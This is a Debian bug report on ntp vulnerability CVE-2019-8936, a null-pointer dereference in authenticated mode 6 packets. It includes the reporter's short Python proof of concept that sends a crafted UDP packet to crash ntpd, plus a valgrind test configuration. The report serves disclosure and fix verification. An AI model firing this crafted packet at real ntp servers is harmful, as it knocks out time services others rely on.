Source: ntp Version: 1:4.2.8p12+dfsg-3 Severity: important Tags: security upstream Forwarded: http://bugs.ntp.org/show_bug.cgi?id=3565
Hi, The following vulnerability was published for ntp. CVE-2019-8936[0]: Crafted null dereference attack in authenticated mode 6 packet If you fix the vulnerability please also make sure to include the CVE (Common Vulnerabilities & Exposures) id in your changelog entry. To verify/illustrate the issue/fix one can use the following as provided by the reporter in the upstream report: #!/usr/bin/env python import sys import socket buf = ("\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" + "\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" + "\x56\xc8\x07\xd4") sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(buf, ('127.0.0.1', 123)) and running ntpd uder valgrind as valgrind ntpd -n -c ~/resources/ntp.conf with ntp.conf: logfile /tmp/ntp.log restrict 127.0.0.1 keys /path/to/keys trustedkey 1 controlkey 1 requestkey 1 and keys 1 M gurka 2 M agurk For further information see: [0] https://security-tracker.debian.org/tracker/CVE-2019-8936 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936 [1] http://bugs.ntp.org/show_bug.cgi?id=3565 [2] http://bk.ntp.org/ntp-stable/ntpd/ntp_control.c?PAGE=diffs&REV=5c8106e7wWtXdh0lzg1ytlWribBTcQ Please adjust the affected versions in the BTS as needed. Regards, Salvatore